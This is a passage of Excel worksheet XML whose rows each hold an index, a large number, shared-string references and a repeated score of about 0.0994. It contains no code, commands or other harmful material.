      <c r="A15807" s="1">
        <v>19861.0</v>
      </c>
      <c r="B15807" s="2">
        <v>5.7157418E7</v>
      </c>
      <c r="C15807" s="2" t="s">
        <v>15255</v>
      </c>
      <c r="D15807" s="2">
        <v>1.0</v>
      </c>
      <c r="E15807" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15807" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15808" ht="15.75" customHeight="1">
      <c r="A15808" s="1">
        <v>20474.0</v>
      </c>
      <c r="B15808" s="2">
        <v>1.2823665E7</v>
      </c>
      <c r="C15808" s="2" t="s">
        <v>15256</v>
      </c>
      <c r="D15808" s="2">
        <v>1.0</v>
      </c>
      <c r="E15808" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15808" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15809" ht="15.75" customHeight="1">
      <c r="A15809" s="1">
        <v>21170.0</v>
      </c>
      <c r="B15809" s="2">
        <v>1.9029554E7</v>
      </c>
      <c r="C15809" s="2" t="s">
        <v>15257</v>
      </c>
      <c r="D15809" s="2">
        <v>1.0</v>
      </c>
      <c r="E15809" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15809" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15810" ht="15.75" customHeight="1">
      <c r="A15810" s="1">
        <v>21263.0</v>
      </c>
      <c r="B15810" s="2">
        <v>2.0045205E7</v>
      </c>
      <c r="C15810" s="2" t="s">
        <v>15258</v>
      </c>
      <c r="D15810" s="2">
        <v>1.0</v>
      </c>
      <c r="E15810" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15810" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15811" ht="15.75" customHeight="1">
      <c r="A15811" s="1">
        <v>22132.0</v>
      </c>
      <c r="B15811" s="2">
        <v>3.1096621E7</v>
      </c>
      <c r="C15811" s="2" t="s">
        <v>15259</v>
      </c>
      <c r="D15811" s="2">
        <v>1.0</v>
      </c>
      <c r="E15811" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15811" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15812" ht="15.75" customHeight="1">
      <c r="A15812" s="1">
        <v>22285.0</v>
      </c>
      <c r="B15812" s="2">
        <v>3.3412361E7</v>
      </c>
      <c r="C15812" s="2" t="s">
        <v>15260</v>
      </c>
      <c r="D15812" s="2">
        <v>1.0</v>
      </c>
      <c r="E15812" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15812" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15813" ht="15.75" customHeight="1">
      <c r="A15813" s="1">
        <v>22591.0</v>
      </c>
      <c r="B15813" s="2">
        <v>3.9107226E7</v>
      </c>
      <c r="C15813" s="2" t="s">
        <v>15261</v>
      </c>
      <c r="D15813" s="2">
        <v>1.0</v>
      </c>
      <c r="E15813" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15813" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15814" ht="15.75" customHeight="1">
      <c r="A15814" s="1">
        <v>23416.0</v>
      </c>
      <c r="B15814" s="2">
        <v>5.6196381E7</v>
      </c>
      <c r="C15814" s="2" t="s">
        <v>15262</v>
      </c>
      <c r="D15814" s="2">
        <v>1.0</v>
      </c>
      <c r="E15814" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15814" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15815" ht="15.75" customHeight="1">
      <c r="A15815" s="1">
        <v>23449.0</v>
      </c>
      <c r="B15815" s="2">
        <v>5683428.0</v>
      </c>
      <c r="C15815" s="2" t="s">
        <v>15263</v>
      </c>
      <c r="D15815" s="2">
        <v>1.0</v>
      </c>
      <c r="E15815" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15815" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15816" ht="15.75" customHeight="1">
      <c r="A15816" s="1">
        <v>23623.0</v>
      </c>
      <c r="B15816" s="2">
        <v>6538680.0</v>
      </c>
      <c r="C15816" s="2" t="s">
        <v>15264</v>
      </c>
      <c r="D15816" s="2">
        <v>1.0</v>
      </c>
      <c r="E15816" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15816" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15817" ht="15.75" customHeight="1">
      <c r="A15817" s="1">
        <v>23668.0</v>
      </c>
      <c r="B15817" s="2">
        <v>6891060.0</v>
      </c>
      <c r="C15817" s="2" t="s">
        <v>15265</v>
      </c>
      <c r="D15817" s="2">
        <v>1.0</v>
      </c>
      <c r="E15817" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15817" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15818" ht="15.75" customHeight="1">
      <c r="A15818" s="1">
        <v>23787.0</v>
      </c>
      <c r="B15818" s="2">
        <v>7697046.0</v>
      </c>
      <c r="C15818" s="2" t="s">
        <v>15266</v>
      </c>
      <c r="D15818" s="2">
        <v>1.0</v>
      </c>
      <c r="E15818" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15818" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15819" ht="15.75" customHeight="1">
      <c r="A15819" s="1">
        <v>24206.0</v>
      </c>
      <c r="B15819" s="2">
        <v>1.0370796E7</v>
      </c>
      <c r="C15819" s="2" t="s">
        <v>15267</v>
      </c>
      <c r="D15819" s="2">
        <v>1.0</v>
      </c>
      <c r="E15819" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15819" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15820" ht="15.75" customHeight="1">
      <c r="A15820" s="1">
        <v>24277.0</v>
      </c>
      <c r="B15820" s="2">
        <v>1.0541384E7</v>
      </c>
      <c r="C15820" s="2" t="s">
        <v>15268</v>
      </c>
      <c r="D15820" s="2">
        <v>1.0</v>
      </c>
      <c r="E15820" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15820" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15821" ht="15.75" customHeight="1">
      <c r="A15821" s="1">
        <v>24406.0</v>
      </c>
      <c r="B15821" s="2">
        <v>1.0818613E7</v>
      </c>
      <c r="C15821" s="2" t="s">
        <v>15269</v>
      </c>
      <c r="D15821" s="2">
        <v>1.0</v>
      </c>
      <c r="E15821" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15821" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15822" ht="15.75" customHeight="1">
      <c r="A15822" s="1">
        <v>25025.0</v>
      </c>
      <c r="B15822" s="2">
        <v>1.2823664E7</v>
      </c>
      <c r="C15822" s="2" t="s">
        <v>15256</v>
      </c>
      <c r="D15822" s="2">
        <v>1.0</v>
      </c>
      <c r="E15822" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15822" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15823" ht="15.75" customHeight="1">
      <c r="A15823" s="1">
        <v>25232.0</v>
      </c>
      <c r="B15823" s="2">
        <v>1.3347807E7</v>
      </c>
      <c r="C15823" s="2" t="s">
        <v>15270</v>
      </c>
      <c r="D15823" s="2">
        <v>1.0</v>
      </c>
      <c r="E15823" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15823" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15824" ht="15.75" customHeight="1">
      <c r="A15824" s="1">
        <v>26857.0</v>
      </c>
      <c r="B15824" s="2">
        <v>1.9029553E7</v>
      </c>
      <c r="C15824" s="2" t="s">
        <v>15257</v>
      </c>
      <c r="D15824" s="2">
        <v>1.0</v>
      </c>
      <c r="E15824" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15824" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15825" ht="15.75" customHeight="1">
      <c r="A15825" s="1">
        <v>27000.0</v>
      </c>
      <c r="B15825" s="2">
        <v>1.990184E7</v>
      </c>
      <c r="C15825" s="2" t="s">
        <v>15271</v>
      </c>
      <c r="D15825" s="2">
        <v>1.0</v>
      </c>
      <c r="E15825" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15825" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15826" ht="15.75" customHeight="1">
      <c r="A15826" s="1">
        <v>27054.0</v>
      </c>
      <c r="B15826" s="2">
        <v>2.0317721E7</v>
      </c>
      <c r="C15826" s="2" t="s">
        <v>15272</v>
      </c>
      <c r="D15826" s="2">
        <v>1.0</v>
      </c>
      <c r="E15826" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15826" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15827" ht="15.75" customHeight="1">
      <c r="A15827" s="1">
        <v>27166.0</v>
      </c>
      <c r="B15827" s="2">
        <v>2.084936E7</v>
      </c>
      <c r="C15827" s="2" t="s">
        <v>15273</v>
      </c>
      <c r="D15827" s="2">
        <v>1.0</v>
      </c>
      <c r="E15827" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15827" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15828" ht="15.75" customHeight="1">
      <c r="A15828" s="1">
        <v>27408.0</v>
      </c>
      <c r="B15828" s="2">
        <v>2.1803528E7</v>
      </c>
      <c r="C15828" s="2" t="s">
        <v>15274</v>
      </c>
      <c r="D15828" s="2">
        <v>1.0</v>
      </c>
      <c r="E15828" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15828" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15829" ht="15.75" customHeight="1">
      <c r="A15829" s="1">
        <v>28360.0</v>
      </c>
      <c r="B15829" s="2">
        <v>2.6021068E7</v>
      </c>
      <c r="C15829" s="2" t="s">
        <v>15275</v>
      </c>
      <c r="D15829" s="2">
        <v>1.0</v>
      </c>
      <c r="E15829" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15829" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15830" ht="15.75" customHeight="1">
      <c r="A15830" s="1">
        <v>28387.0</v>
      </c>
      <c r="B15830" s="2">
        <v>2.6119611E7</v>
      </c>
      <c r="C15830" s="2" t="s">
        <v>15276</v>
      </c>
      <c r="D15830" s="2">
        <v>1.0</v>
      </c>
      <c r="E15830" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15830" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15831" ht="15.75" customHeight="1">
      <c r="A15831" s="1">
        <v>29050.0</v>
      </c>
      <c r="B15831" s="2">
        <v>3.0214999E7</v>
      </c>
      <c r="C15831" s="2" t="s">
        <v>15277</v>
      </c>
      <c r="D15831" s="2">
        <v>1.0</v>
      </c>
      <c r="E15831" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15831" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15832" ht="15.75" customHeight="1">
      <c r="A15832" s="1">
        <v>29400.0</v>
      </c>
      <c r="B15832" s="2">
        <v>3.1958088E7</v>
      </c>
      <c r="C15832" s="2" t="s">
        <v>15278</v>
      </c>
      <c r="D15832" s="2">
        <v>1.0</v>
      </c>
      <c r="E15832" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15832" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15833" ht="15.75" customHeight="1">
      <c r="A15833" s="1">
        <v>30404.0</v>
      </c>
      <c r="B15833" s="2">
        <v>3.8753116E7</v>
      </c>
      <c r="C15833" s="2" t="s">
        <v>15279</v>
      </c>
      <c r="D15833" s="2">
        <v>1.0</v>
      </c>
      <c r="E15833" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15833" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15834" ht="15.75" customHeight="1">
      <c r="A15834" s="1">
        <v>31265.0</v>
      </c>
      <c r="B15834" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C15834" s="2" t="s">
        <v>15280</v>
      </c>
      <c r="D15834" s="2">
        <v>1.0</v>
      </c>
      <c r="E15834" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15834" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15835" ht="15.75" customHeight="1">
      <c r="A15835" s="1">
        <v>32468.0</v>
      </c>
      <c r="B15835" s="2">
        <v>5683427.0</v>
      </c>
      <c r="C15835" s="2" t="s">
        <v>15263</v>
      </c>
      <c r="D15835" s="2">
        <v>1.0</v>
      </c>
      <c r="E15835" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15835" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15836" ht="15.75" customHeight="1">
      <c r="A15836" s="1">
        <v>32895.0</v>
      </c>
      <c r="B15836" s="2">
        <v>6395358.0</v>
      </c>
      <c r="C15836" s="2" t="s">
        <v>15281</v>
      </c>
      <c r="D15836" s="2">
        <v>1.0</v>
      </c>
      <c r="E15836" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15836" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15837" ht="15.75" customHeight="1">
      <c r="A15837" s="1">
        <v>34132.0</v>
      </c>
      <c r="B15837" s="2">
        <v>9779015.0</v>
      </c>
      <c r="C15837" s="2" t="s">
        <v>15282</v>
      </c>
      <c r="D15837" s="2">
        <v>1.0</v>
      </c>
      <c r="E15837" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15837" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15838" ht="15.75" customHeight="1">
      <c r="A15838" s="1">
        <v>34241.0</v>
      </c>
      <c r="B15838" s="2">
        <v>4731066.0</v>
      </c>
      <c r="C15838" s="2" t="s">
        <v>15283</v>
      </c>
      <c r="D15838" s="2">
        <v>1.0</v>
      </c>
      <c r="E15838" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15838" s="2">
        <v>0.09935897435897435</v>
      </c>
    </row>
    <row r="15839" ht="15.75" customHeight="1">
      <c r="A15839" s="1">
        <v>248.0</v>
      </c>
      <c r="B15839" s="2">
        <v>1.5033223E7</v>
      </c>
      <c r="C15839" s="2" t="s">
        <v>15284</v>
      </c>
      <c r="D15839" s="2">
        <v>1.0</v>
      </c>
      <c r="E15839" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15839" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15840" ht="15.75" customHeight="1">
      <c r="A15840" s="1">
        <v>671.0</v>
      </c>
      <c r="B15840" s="2">
        <v>2.024467E7</v>
      </c>
      <c r="C15840" s="2" t="s">
        <v>15285</v>
      </c>
      <c r="D15840" s="2">
        <v>1.0</v>
      </c>
      <c r="E15840" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15840" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15841" ht="15.75" customHeight="1">
      <c r="A15841" s="1">
        <v>693.0</v>
      </c>
      <c r="B15841" s="2">
        <v>2.0414723E7</v>
      </c>
      <c r="C15841" s="2" t="s">
        <v>15286</v>
      </c>
      <c r="D15841" s="2">
        <v>1.0</v>
      </c>
      <c r="E15841" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15841" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15842" ht="15.75" customHeight="1">
      <c r="A15842" s="1">
        <v>1671.0</v>
      </c>
      <c r="B15842" s="2">
        <v>2.8304163E7</v>
      </c>
      <c r="C15842" s="2" t="s">
        <v>15287</v>
      </c>
      <c r="D15842" s="2">
        <v>1.0</v>
      </c>
      <c r="E15842" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15842" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15843" ht="15.75" customHeight="1">
      <c r="A15843" s="1">
        <v>1969.0</v>
      </c>
      <c r="B15843" s="2">
        <v>3.0382993E7</v>
      </c>
      <c r="C15843" s="2" t="s">
        <v>15288</v>
      </c>
      <c r="D15843" s="2">
        <v>1.0</v>
      </c>
      <c r="E15843" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15843" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15844" ht="15.75" customHeight="1">
      <c r="A15844" s="1">
        <v>2013.0</v>
      </c>
      <c r="B15844" s="2">
        <v>3.0701868E7</v>
      </c>
      <c r="C15844" s="2" t="s">
        <v>15289</v>
      </c>
      <c r="D15844" s="2">
        <v>1.0</v>
      </c>
      <c r="E15844" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15844" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15845" ht="15.75" customHeight="1">
      <c r="A15845" s="1">
        <v>2734.0</v>
      </c>
      <c r="B15845" s="2">
        <v>3.4992353E7</v>
      </c>
      <c r="C15845" s="2" t="s">
        <v>15290</v>
      </c>
      <c r="D15845" s="2">
        <v>1.0</v>
      </c>
      <c r="E15845" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15845" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15846" ht="15.75" customHeight="1">
      <c r="A15846" s="1">
        <v>2863.0</v>
      </c>
      <c r="B15846" s="2">
        <v>3.5543815E7</v>
      </c>
      <c r="C15846" s="2" t="s">
        <v>15291</v>
      </c>
      <c r="D15846" s="2">
        <v>1.0</v>
      </c>
      <c r="E15846" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15846" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15847" ht="15.75" customHeight="1">
      <c r="A15847" s="1">
        <v>3337.0</v>
      </c>
      <c r="B15847" s="2">
        <v>3.7708925E7</v>
      </c>
      <c r="C15847" s="2" t="s">
        <v>15292</v>
      </c>
      <c r="D15847" s="2">
        <v>1.0</v>
      </c>
      <c r="E15847" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15847" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15848" ht="15.75" customHeight="1">
      <c r="A15848" s="1">
        <v>4384.0</v>
      </c>
      <c r="B15848" s="2">
        <v>4.2185715E7</v>
      </c>
      <c r="C15848" s="2" t="s">
        <v>15293</v>
      </c>
      <c r="D15848" s="2">
        <v>1.0</v>
      </c>
      <c r="E15848" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15848" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15849" ht="15.75" customHeight="1">
      <c r="A15849" s="1">
        <v>4580.0</v>
      </c>
      <c r="B15849" s="2">
        <v>4.276667E7</v>
      </c>
      <c r="C15849" s="2" t="s">
        <v>15294</v>
      </c>
      <c r="D15849" s="2">
        <v>1.0</v>
      </c>
      <c r="E15849" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15849" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15850" ht="15.75" customHeight="1">
      <c r="A15850" s="1">
        <v>4582.0</v>
      </c>
      <c r="B15850" s="2">
        <v>4.276667E7</v>
      </c>
      <c r="C15850" s="2" t="s">
        <v>15295</v>
      </c>
      <c r="D15850" s="2">
        <v>1.0</v>
      </c>
      <c r="E15850" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15850" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15851" ht="15.75" customHeight="1">
      <c r="A15851" s="1">
        <v>4961.0</v>
      </c>
      <c r="B15851" s="2">
        <v>4.4076742E7</v>
      </c>
      <c r="C15851" s="2" t="s">
        <v>15296</v>
      </c>
      <c r="D15851" s="2">
        <v>1.0</v>
      </c>
      <c r="E15851" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15851" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15852" ht="15.75" customHeight="1">
      <c r="A15852" s="1">
        <v>5075.0</v>
      </c>
      <c r="B15852" s="2">
        <v>4.442847E7</v>
      </c>
      <c r="C15852" s="2" t="s">
        <v>15297</v>
      </c>
      <c r="D15852" s="2">
        <v>1.0</v>
      </c>
      <c r="E15852" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15852" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15853" ht="15.75" customHeight="1">
      <c r="A15853" s="1">
        <v>5189.0</v>
      </c>
      <c r="B15853" s="2">
        <v>4.4789762E7</v>
      </c>
      <c r="C15853" s="2" t="s">
        <v>15298</v>
      </c>
      <c r="D15853" s="2">
        <v>1.0</v>
      </c>
      <c r="E15853" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15853" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15854" ht="15.75" customHeight="1">
      <c r="A15854" s="1">
        <v>5405.0</v>
      </c>
      <c r="B15854" s="2">
        <v>4.5496637E7</v>
      </c>
      <c r="C15854" s="2" t="s">
        <v>15299</v>
      </c>
      <c r="D15854" s="2">
        <v>1.0</v>
      </c>
      <c r="E15854" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15854" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15855" ht="15.75" customHeight="1">
      <c r="A15855" s="1">
        <v>5448.0</v>
      </c>
      <c r="B15855" s="2">
        <v>4.5636226E7</v>
      </c>
      <c r="C15855" s="2" t="s">
        <v>15300</v>
      </c>
      <c r="D15855" s="2">
        <v>1.0</v>
      </c>
      <c r="E15855" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15855" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15856" ht="15.75" customHeight="1">
      <c r="A15856" s="1">
        <v>5457.0</v>
      </c>
      <c r="B15856" s="2">
        <v>4.5659874E7</v>
      </c>
      <c r="C15856" s="2" t="s">
        <v>15301</v>
      </c>
      <c r="D15856" s="2">
        <v>1.0</v>
      </c>
      <c r="E15856" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15856" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15857" ht="15.75" customHeight="1">
      <c r="A15857" s="1">
        <v>6314.0</v>
      </c>
      <c r="B15857" s="2">
        <v>4.8247004E7</v>
      </c>
      <c r="C15857" s="2" t="s">
        <v>15302</v>
      </c>
      <c r="D15857" s="2">
        <v>1.0</v>
      </c>
      <c r="E15857" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15857" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15858" ht="15.75" customHeight="1">
      <c r="A15858" s="1">
        <v>6489.0</v>
      </c>
      <c r="B15858" s="2">
        <v>4.8684065E7</v>
      </c>
      <c r="C15858" s="2" t="s">
        <v>15303</v>
      </c>
      <c r="D15858" s="2">
        <v>1.0</v>
      </c>
      <c r="E15858" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15858" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15859" ht="15.75" customHeight="1">
      <c r="A15859" s="1">
        <v>6639.0</v>
      </c>
      <c r="B15859" s="2">
        <v>4.9063021E7</v>
      </c>
      <c r="C15859" s="2" t="s">
        <v>15304</v>
      </c>
      <c r="D15859" s="2">
        <v>1.0</v>
      </c>
      <c r="E15859" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15859" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15860" ht="15.75" customHeight="1">
      <c r="A15860" s="1">
        <v>6661.0</v>
      </c>
      <c r="B15860" s="2">
        <v>4.9111227E7</v>
      </c>
      <c r="C15860" s="2" t="s">
        <v>15305</v>
      </c>
      <c r="D15860" s="2">
        <v>1.0</v>
      </c>
      <c r="E15860" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15860" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15861" ht="15.75" customHeight="1">
      <c r="A15861" s="1">
        <v>6671.0</v>
      </c>
      <c r="B15861" s="2">
        <v>4.9137849E7</v>
      </c>
      <c r="C15861" s="2" t="s">
        <v>15306</v>
      </c>
      <c r="D15861" s="2">
        <v>1.0</v>
      </c>
      <c r="E15861" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15861" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15862" ht="15.75" customHeight="1">
      <c r="A15862" s="1">
        <v>6700.0</v>
      </c>
      <c r="B15862" s="2">
        <v>4.9203296E7</v>
      </c>
      <c r="C15862" s="2" t="s">
        <v>15307</v>
      </c>
      <c r="D15862" s="2">
        <v>1.0</v>
      </c>
      <c r="E15862" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15862" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15863" ht="15.75" customHeight="1">
      <c r="A15863" s="1">
        <v>7147.0</v>
      </c>
      <c r="B15863" s="2">
        <v>5.0464054E7</v>
      </c>
      <c r="C15863" s="2" t="s">
        <v>15308</v>
      </c>
      <c r="D15863" s="2">
        <v>1.0</v>
      </c>
      <c r="E15863" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15863" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15864" ht="15.75" customHeight="1">
      <c r="A15864" s="1">
        <v>7334.0</v>
      </c>
      <c r="B15864" s="2">
        <v>5.092632E7</v>
      </c>
      <c r="C15864" s="2" t="s">
        <v>15309</v>
      </c>
      <c r="D15864" s="2">
        <v>1.0</v>
      </c>
      <c r="E15864" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15864" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15865" ht="15.75" customHeight="1">
      <c r="A15865" s="1">
        <v>7387.0</v>
      </c>
      <c r="B15865" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C15865" s="2" t="s">
        <v>15310</v>
      </c>
      <c r="D15865" s="2">
        <v>1.0</v>
      </c>
      <c r="E15865" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15865" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15866" ht="15.75" customHeight="1">
      <c r="A15866" s="1">
        <v>7388.0</v>
      </c>
      <c r="B15866" s="2">
        <v>5.1082366E7</v>
      </c>
      <c r="C15866" s="2" t="s">
        <v>15311</v>
      </c>
      <c r="D15866" s="2">
        <v>1.0</v>
      </c>
      <c r="E15866" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15866" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15867" ht="15.75" customHeight="1">
      <c r="A15867" s="1">
        <v>7483.0</v>
      </c>
      <c r="B15867" s="2">
        <v>5.1356497E7</v>
      </c>
      <c r="C15867" s="2" t="s">
        <v>15312</v>
      </c>
      <c r="D15867" s="2">
        <v>1.0</v>
      </c>
      <c r="E15867" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15867" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15868" ht="15.75" customHeight="1">
      <c r="A15868" s="1">
        <v>7553.0</v>
      </c>
      <c r="B15868" s="2">
        <v>5.152711E7</v>
      </c>
      <c r="C15868" s="2" t="s">
        <v>15313</v>
      </c>
      <c r="D15868" s="2">
        <v>1.0</v>
      </c>
      <c r="E15868" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15868" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15869" ht="15.75" customHeight="1">
      <c r="A15869" s="1">
        <v>7881.0</v>
      </c>
      <c r="B15869" s="2">
        <v>5.2415152E7</v>
      </c>
      <c r="C15869" s="2" t="s">
        <v>15314</v>
      </c>
      <c r="D15869" s="2">
        <v>1.0</v>
      </c>
      <c r="E15869" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15869" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15870" ht="15.75" customHeight="1">
      <c r="A15870" s="1">
        <v>8853.0</v>
      </c>
      <c r="B15870" s="2">
        <v>5.472383E7</v>
      </c>
      <c r="C15870" s="2" t="s">
        <v>15315</v>
      </c>
      <c r="D15870" s="2">
        <v>1.0</v>
      </c>
      <c r="E15870" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15870" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15871" ht="15.75" customHeight="1">
      <c r="A15871" s="1">
        <v>9067.0</v>
      </c>
      <c r="B15871" s="2">
        <v>5.511948E7</v>
      </c>
      <c r="C15871" s="2" t="s">
        <v>15316</v>
      </c>
      <c r="D15871" s="2">
        <v>1.0</v>
      </c>
      <c r="E15871" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15871" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15872" ht="15.75" customHeight="1">
      <c r="A15872" s="1">
        <v>9113.0</v>
      </c>
      <c r="B15872" s="2">
        <v>5.5201802E7</v>
      </c>
      <c r="C15872" s="2" t="s">
        <v>15317</v>
      </c>
      <c r="D15872" s="2">
        <v>1.0</v>
      </c>
      <c r="E15872" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15872" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15873" ht="15.75" customHeight="1">
      <c r="A15873" s="1">
        <v>9132.0</v>
      </c>
      <c r="B15873" s="2">
        <v>5.5234775E7</v>
      </c>
      <c r="C15873" s="2" t="s">
        <v>15318</v>
      </c>
      <c r="D15873" s="2">
        <v>1.0</v>
      </c>
      <c r="E15873" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F15873" s="2">
        <v>0.09935897435897433</v>
      </c>
    </row>
    <row r="15874" ht="15.75" customHeight="1">
      <c r="A15874" s="1">
